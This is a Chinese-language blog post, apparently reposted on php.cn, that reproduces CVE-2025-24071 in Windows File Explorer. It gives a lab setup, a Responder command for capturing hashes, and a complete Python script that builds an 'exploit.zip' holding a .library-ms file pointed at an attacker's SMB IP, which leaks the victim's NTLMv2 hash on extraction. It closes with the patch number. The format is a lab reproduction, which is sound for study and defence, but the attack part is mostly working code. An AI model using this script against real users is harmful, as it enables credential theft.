【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞

蓮花仙者
发布: 2025-09-01 09:16:23
原创
844人浏览过

0x00 前言

Windows 文件资源管理器(File Explorer)作为操作系统的关键组成部分,承担着管理本地与网络文件资源的核心任务。它提供用户友好的图形界面,支持对文件和文件夹进行创建、复制、移动、删除、重命名等基本操作,同时集成了网络共享访问、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具

0x01 漏洞概述

当 Windows 资源管理器在解压含有特殊构造的

.library-ms
登录后复制
文件的 RAR 或 ZIP 压缩包时,会自动读取并解析其中嵌入的恶意 SMB 路径(例如
\\192.168.1.116\shared
登录后复制
),从而引发隐式的 NTLM 认证请求,造成用户的 NTLMv2 哈希值泄露,存在严重的安全风险。

0x02 漏洞验证过程

(1) 所需工具清单

Windows 主机(目标机器)IP: 192.168.2.11  
Kali Linux 主机(攻击方)IP: 192.168.2.12  
CVE-2025-24071 的利用脚本 a.py  
Kali Linux 上的中间人攻击工具 Responder
登录后复制

(2) 实际复现步骤

1、配置 Windows 主机 IP 地址为 192.168.2.11

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞2、设置 Kali Linux 的 IP 为 192.168.2.12

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞3、在 Kali 系统中启动 Responder 工具,执行命令:

ChatBA
ChatBA

AI幻灯片生成工具

ChatBA 74
查看详情 ChatBA
sudo responder -I eth0 -v
登录后复制

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞4、运行 Python 脚本生成恶意压缩包,命令如下:

python a.py
登录后复制

a.py 脚本代码如下:

import os
import zipfile

def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")
    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<librarydescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchconnectordescriptionlist>
<searchconnectordescription>
<simplelocation>
<url>\\{ip_address}\shared</url>
</simplelocation>
</searchconnectordescription>
</searchconnectordescriptionlist>
</librarydescription>"""
    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)
    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(library_file_name)
    if os.path.exists(library_file_name):
        os.remove(library_file_name)
    print("completed")

if __name__ == "__main__":
    main()
登录后复制

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞5、将生成的 exploit.zip 文件传输至 Windows 系统并进行解压操作。

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞6、Kali Linux 成功捕获来自 Windows 的 NTLMv2 哈希凭证

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞0x03 修复方案

微软已发布补丁修复此漏洞,补丁编号为:KB5053606

【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞0x04 参考资料

https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636

以上就是【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞的详细内容,更多请关注php中文网其它相关文章!

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号